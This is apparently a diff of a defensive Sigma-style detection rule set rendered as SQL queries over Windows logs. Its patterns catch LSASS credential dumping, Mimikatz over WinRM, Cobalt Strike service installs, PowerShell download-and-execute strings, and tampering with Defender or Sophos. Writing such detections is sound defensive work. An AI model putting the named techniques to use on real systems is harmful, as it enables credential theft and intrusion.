[ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '%sdset%' ESCAPE '\\' AND CommandLine LIKE '%A;%' ESCAPE '\\') AND (CommandLine LIKE '%;IU%' ESCAPE '\\' OR CommandLine LIKE '%;SU%' ESCAPE '\\' OR CommandLine LIKE '%;BA%' ESCAPE '\\' OR CommandLine LIKE '%;SY%' ESCAPE '\\' OR CommandLine LIKE '%;WD%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (SourceImage LIKE '%\\\\TrolleyExpress.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\ProcessDump.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\dump64.exe' ESCAPE '\\') AND (GrantedAccess LIKE '%10' ESCAPE '\\' OR GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\' OR GrantedAccess LIKE '%FF' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sc_sdset_allow_service_changes.yml" + "filename": "proc_access_win_lsass_memdump_evasion.yml" }, { - "title": "Suspicious Remote Child Process From Outlook", - "id": "e212d415-0e93-435f-9e1a-f29005bb4723", - "status": "test", - "description": "Detects a suspicious child process spawning from Outlook where the image is located in a remote location (SMB/WebDav shares).", - "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems)", + "title": "Mimikatz through Windows Remote Management", + "id": "aa35a627-33fb-4d04-a165-d33b4afca3e8", + "status": "stable", + "description": "Detects usage of mimikatz through WinRM protocol by monitoring access to lsass process by wsmprovhost.exe.", + "author": "Patryk Prauze - ING Tech", "tags": [ + "attack.credential_access", "attack.execution", - "attack.t1059", - "attack.t1202" + "attack.t1003.001", + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.006", + "attack.s0002" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' AND NewProcessName LIKE '\\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\wsmprovhost.exe' ESCAPE '\\') AND NOT (GrantedAccess = '0x80000000'))" ], - "filename": "proc_creation_win_office_outlook_susp_child_processes_remote.yml" + "filename": "proc_access_win_mimikatz_trough_winrm.yml" }, { - "title": "Invoke-Obfuscation Via Stdin", - "id": "9c14c9fa-1a63-4a64-8e57-d19280559490", - "status": "test", - "description": "Detects Obfuscated Powershell via Stdin in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "LittleCorporal Generated Maldoc Injection", + "id": "7bdde3bf-2a42-4c39-aa31-a92b3e17afac", + "status": "experimental", + "description": "Detects the process injection of a LittleCorporal generated Maldoc.", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", "attack.execution", - "attack.t1059.001" + "attack.t1204.002", + "attack.t1055.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND (CommandLine LIKE '%environment%' ESCAPE '\\' OR CommandLine LIKE '%invoke%' ESCAPE '\\' OR CommandLine LIKE '%input%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (SourceImage LIKE '%\\\\winword.exe' ESCAPE '\\' AND CallTrace LIKE '%:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v2.%' ESCAPE '\\' AND CallTrace LIKE '%UNKNOWN%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_via_stdin.yml" + "filename": "proc_access_win_littlecorporal_generated_maldoc.yml" }, { - "title": "Security Privileges Enumeration Via Whoami.EXE", - "id": "97a80ec7-0e2f-4d05-9ef4-65760e634f6b", + "title": "Lsass Memory Dump via Comsvcs DLL", + "id": "a49fa4d5-11db-418c-8473-1e014a8dd462", + "status": "test", + "description": "Detects adversaries leveraging the MiniDump export function from comsvcs.dll via rundll32 to perform a memory dump from lsass.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ], + "falsepositives": [ + "Unknown" + ], + "level": "critical", + "rule": [ + "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\rundll32.exe' ESCAPE '\\' AND CallTrace LIKE '%comsvcs.dll%' ESCAPE '\\')" + ], + "filename": "proc_access_win_lsass_dump_comsvcs_dll.yml" + }, + { + "title": "Potential Credential Dumping Attempt Via PowerShell", + "id": "0f920ebe-7aea-4c54-b202-9aa0c609cfe5", "status": "experimental", - "description": "Detects a whoami.exe executed with the /priv command line flag instructing the tool to show all current user privileges. This is often used after a privilege escalation attempt.", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects PowerShell processes requesting access to \"lsass.exe\"", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.privilege_escalation", - "attack.discovery", - "attack.t1033" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND (CommandLine LIKE '% /priv%' ESCAPE '\\' OR CommandLine LIKE '% -priv%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_whoami_priv_discovery.yml" + "filename": "proc_access_win_winapi_in_powershell_credentials_dumping.yml" }, { - "title": "Suspicious Process Created Via Wmic.EXE", - "id": "3c89a1e8-0fba-449e-8f1b-8409d6267ec8", + "title": "Potential Persistence Via Logon Scripts - Registry", + "id": "9ace0707-b560-49b8-b6ca-5148b42f39fb", "status": "test", - "description": "Detects WMIC executing \"process call create\" with suspicious calls to processes such as \"rundll32\", \"regsrv32\", etc.", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects creation of UserInitMprLogonScript persistence method", + "author": "Tom Ueltschi (@c_APT_ure)", "tags": [ - "attack.execution", - "attack.t1047" + "attack.t1037.001", + "attack.persistence", + "attack.lateral_movement" ], "falsepositives": [ - "Unknown" + "Exclude legitimate logon scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%process %' ESCAPE '\\' AND CommandLine LIKE '%call %' ESCAPE '\\' AND CommandLine LIKE '%create %' ESCAPE '\\' AND (CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%bitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%appdata\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%comspec\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%localappdata\\%%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'New registry value created' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'CreateKey' AND TargetObject LIKE '%UserInitMprLogonScript%' ESCAPE '\\')" ], - "filename": "proc_creation_win_wmic_susp_process_creation.yml" + "filename": "registry_add_persistence_logon_scripts_userinitmprlogonscript.yml" }, { - "title": "Suspicious TSCON Start as SYSTEM", - "id": "9847f263-4a81-424f-970c-875dab15b79b", + "title": "Suspicious Execution Of Renamed Sysinternals Tools - Registry", + "id": "f50f3c09-557d-492d-81db-9064a8d4e211", "status": "experimental", - "description": "Detects a tscon.exe start as LOCAL SYSTEM", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the creation of the \"accepteula\" key related to the Sysinternals tools being created from executables with the wrong name (e.g. a renamed Sysinternals tool)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.resource_development", + "attack.t1588.002" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\tscon.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'New registry value created' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'CreateKey' AND (TargetObject LIKE '%\\\\Active Directory Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Handle%' ESCAPE '\\' OR TargetObject LIKE '%\\\\LiveKd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ProcDump%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Process Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsExec%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsLoggedon%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsLoglist%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPasswd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPing%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsService%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SDelete%' ESCAPE '\\') AND TargetObject LIKE '%\\\\EulaAccepted' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ADExplorer64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\handle.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\handle64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\livekd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\livekd64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procexp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsExec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsExec64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsLoggedon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsLoggedon64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psloglist.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psloglist64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pspasswd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pspasswd64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsPing.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsPing64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsService.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsService64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sdelete.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_tscon_localsystem.yml" + "filename": "registry_add_pua_sysinternals_renamed_execution_via_eula.yml" }, { - "title": "Operator Bloopers Cobalt Strike Modules", - "id": "4f154fb6-27d1-4813-a759-78b93e0b9c48", - "status": "experimental", - "description": "Detects Cobalt Strike module/commands accidentally entered in CMD shell", - "author": "_pete_0, TheDFIRReport", + "title": "Potential Ursnif Malware Activity - Registry", + "id": "21f17060-b282-4249-ade0-589ea3591558", + "status": "test", + "description": "Detects registry keys related to Ursnif malware.", + "author": "megan201296", "tags": [ "attack.execution", - "attack.t1059.003" + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'Cmd.Exe' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ShareFinder%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Kerberoast%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SMBAutoBrute%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR CommandLine LIKE '%zerologon%' ESCAPE '\\' OR CommandLine LIKE '%av\\_query%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'New registry value created' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'CreateKey' AND TargetObject LIKE '%\\\\Software\\\\AppDataLow\\\\Software\\\\Microsoft\\\\%' ESCAPE '\\') AND NOT ((TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\RepService\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\IME\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\Edge\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_cobaltstrike_bloopers_modules.yml" + "filename": "registry_add_malware_ursnif.yml" }, { - "title": "Renamed Plink Execution", - "id": "1c12727d-02bf-45ff-a9f3-d49806a3cf43", + "title": "Potential Persistence Via New AMSI Providers - Registry", + "id": "33efc23c-6ea2-4503-8cfe-bdf82ce8f705", "status": "experimental", - "description": "Detects the execution of a renamed version of the Plink binary", + "description": "Detects when an attacker registers a new AMSI provider in order to achieve persistence", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036" + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Legitimate security products adding their own AMSI providers. Filter these according to your environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'Plink' OR (CommandLine LIKE '% -l forward%' ESCAPE '\\' AND CommandLine LIKE '% -P %' ESCAPE '\\' AND CommandLine LIKE '% -R %' ESCAPE '\\')) AND NOT (NewProcessName LIKE '%\\\\plink.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'New registry value created' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'CreateKey' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\AMSI\\\\Providers\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\AMSI\\\\Providers\\\\%' ESCAPE '\\')) AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_renamed_plink.yml" + "filename": "registry_add_persistence_amsi_providers.yml" }, { - "title": "Suspicious PowerShell Download and Execute Pattern", - "id": "e6c54d94-498c-4562-a37c-b469d8e9a275", + "title": "Potential NetWire RAT Activity - Registry", + "id": "1d218616-71b0-4c40-855b-9dbe75510f7f", "status": "experimental", - "description": "Detects suspicious PowerShell download patterns that are often used in malicious scripts, stagers or downloaders (make sure that your backend applies the strings case-insensitive)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects registry keys related to NetWire RAT", + "author": "Christopher Peacock", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Software installers that pull packages from remote systems and execute them" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%IEX ((New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%IEX (New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%IEX((New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%IEX(New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '% -command (New-Object System.Net.WebClient).DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '% -c (New-Object System.Net.WebClient).DownloadFile(%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'New registry value created' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'CreateKey' AND TargetObject LIKE '%\\\\software\\\\NetWire%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_susp_download_patterns.yml" + "filename": "registry_add_malware_netwire.yml" }, { - "title": "Potential CVE-2021-41379 Exploitation Attempt", - "id": "af8bbce4-f751-46b4-8d91-82a33a736f61", - "status": "test", - "description": "Detects potential exploitation attempts of CVE-2021-41379 (InstallerFileTakeOver), a local privilege escalation (LPE) vulnerability where the attacker spawns a \"cmd.exe\" process as a child of Microsoft Edge elevation service \"elevation_service\" with \"LOCAL_SYSTEM\" rights", - "author": "Florian Roth (Nextron Systems)", + "title": "CobaltStrike Service Installations in Registry", + "id": "61a7697c-cb79-42a8-a2ff-5f0cdfae0130", + "status": "test", + "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement.\nWe can also catch this by system log 7045 (https://github.com/SigmaHQ/sigma/blob/master/rules/windows/builtin/win_cobaltstrike_service_installs.yml)\nIn some SIEM you can catch those events also in HKLM\\System\\ControlSet001\\Services or HKLM\\System\\ControlSet002\\Services, however, this rule is based on a regular sysmon's events.\n", + "author": "Wojciech Lesicki", "tags": [ + "attack.execution", "attack.privilege_escalation", - "attack.t1068" + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1543.003", + "attack.t1569.002" ], "falsepositives": [ "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll')) AND (ParentProcessName LIKE '%\\\\elevation\\_service.exe' ESCAPE '\\' AND IntegrityLevel = 'System'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%HKLM\\\\System\\\\CurrentControlSet\\\\Services%' ESCAPE '\\') AND ((NewValue LIKE '%ADMIN$%' ESCAPE '\\' AND NewValue LIKE '%.exe%' ESCAPE '\\') OR (NewValue LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND NewValue LIKE '%start%' ESCAPE '\\' AND NewValue LIKE '%powershell%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_cve_2021_41379.yml" + "filename": "registry_set_cobaltstrike_service_installs.yml" }, { - "title": "Wscript Shell Run In CommandLine", - "id": "2c28c248-7f50-417a-9186-a85b223010ee", + "title": "Tamper With Sophos AV Registry Keys", + "id": "9f4662ac-17ca-43aa-8f12-5d7b989d0101", "status": "experimental", - "description": "Detects the presence of the keywords \"Wscript\", \"Shell\" and \"Run\" in the command, which could indicate a suspicious activity", + "description": "Detects tamper attempts to sophos av functionality via registry key modification", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Rare legitimate inline scripting by some administrators" + "Some FP may occur when the feature is disabled by the AV itself, you should always investigate if the action was legitimate" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%Wscript.%' ESCAPE '\\' AND CommandLine LIKE '%.Shell%' ESCAPE '\\' AND CommandLine LIKE '%.Run%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Sophos Endpoint Defense\\\\TamperProtection\\\\Config\\\\SAVEnabled%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Sophos Endpoint Defense\\\\TamperProtection\\\\Config\\\\SEDEnabled%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Sophos\\\\SAVService\\\\TamperProtection\\\\Enabled%' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)')" ], - "filename": "proc_creation_win_script_wscript_shell_cli.yml" + "filename": "registry_set_sophos_av_tamper.yml" }, { - "title": "PrintBrm ZIP Creation of Extraction", - "id": "cafeeba3-01da-4ab4-b6c4-a31b1d9730c7", + "title": "Potential Persistence Via AutodialDLL", + "id": "e6fe26ee-d063-4f5b-b007-39e90aaf50e3", "status": "experimental", - "description": "Detects the execution of the LOLBIN PrintBrm.exe, which can be used to create or extract ZIP files. PrintBrm.exe should not be run on a normal workstation.", - "author": "frack113", + "description": "Detects change the the \"AutodialDLL\" key which could be used as a persistence method to load custom DLL via the \"ws2_32\" library", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105", - "attack.defense_evasion", - "attack.t1564.004" + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\PrintBrm.exe' ESCAPE '\\' AND CommandLine LIKE '% -f%' ESCAPE '\\' AND CommandLine LIKE '%.zip%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Services\\\\WinSock2\\\\Parameters\\\\AutodialDLL%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_printbrm.yml" + "filename": "registry_set_persistence_autodial_dll.yml" }, { - "title": "HackTool - Potential Impacket Lateral Movement Activity", - "id": "10c14723-61c7-4c75-92ca-9af245723ad2", - "status": "stable", - "description": "Detects wmiexec/dcomexec/atexec/smbexec from Impacket framework", - "author": "Ecco, oscd.community, Jonhnathan Ribeiro, Tim Rauch", + "title": "Disable Windows Defender Functionalities Via Registry Keys", + "id": "0eb46774-f1ab-4a74-8238-1155855f2263", + "status": "experimental", + "description": "Detects when attackers or tools disable Windows Defender functionalities via the windows registry", + "author": "AlertIQ, Ján Trenčanský, frack113, Nasreddine Bencherchali", "tags": [ - "attack.execution", - "attack.t1047", - "attack.lateral_movement", - "attack.t1021.003" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Administrator actions" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((ParentProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mmc.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\') AND CommandLine LIKE '%cmd.exe%' ESCAPE '\\' AND CommandLine LIKE '%/Q%' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%\\\\\\\\127.0.0.1\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%&1%' ESCAPE '\\') OR ((ParentCommandLine LIKE '%svchost.exe -k netsvcs%' ESCAPE '\\' OR ParentCommandLine LIKE '%taskeng.exe%' ESCAPE '\\') AND CommandLine LIKE '%cmd.exe%' ESCAPE '\\' AND CommandLine LIKE '%/C%' ESCAPE '\\' AND CommandLine LIKE '%Windows\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%&1%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\') AND (((TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableBehaviorMonitoring' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableIOAVProtection' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableOnAccessProtection' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableRealtimeMonitoring' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableScanOnRealtimeEnable' ESCAPE '\\' OR TargetObject LIKE '%\\\\Reporting\\\\DisableEnhancedNotifications' ESCAPE '\\' OR TargetObject LIKE '%\\\\SpyNet\\\\DisableBlockAtFirstSeen' ESCAPE '\\' OR TargetObject LIKE '%\\\\DisableAntiSpyware' ESCAPE '\\' OR TargetObject LIKE '%\\\\DisableAntiVirus' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)') OR ((TargetObject LIKE '%\\\\SpyNet\\\\SpynetReporting' ESCAPE '\\' OR TargetObject LIKE '%\\\\SpyNet\\\\SubmitSamplesConsent' ESCAPE '\\' OR TargetObject LIKE '%\\\\MpEngine\\\\MpEnablePus' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)')))" ], - "filename": "proc_creation_win_hktl_impacket_lateral_movement.yml" + "filename": "registry_set_windows_defender_tamper.yml" }, { - "title": "Suspicious WMIC Execution Via Office Process", - "id": "e1693bc8-7168-4eab-8718-cdcaa68a1738", + "title": "Potential Attachment Manager Settings Associations Tamper", + "id": "a9b6c011-ab69-4ddb-bc0a-c4f21c80ec47", "status": "experimental", - "description": "Office application called wmic to proxye execution through a LOLBIN process. This is often used to break suspicious parent-child chain (Office app spawns LOLBin).", - "author": "Vadim Khrykov, Cyb3rEng", + "description": "Detects tampering with attachment manager settings policies associations to lower the default file type risks (See reference for more information)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.t1204.002", - "attack.t1047", - "attack.t1218.010", - "attack.execution", "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\POWERPNT.exe' ESCAPE '\\' OR ParentProcessName LIKE 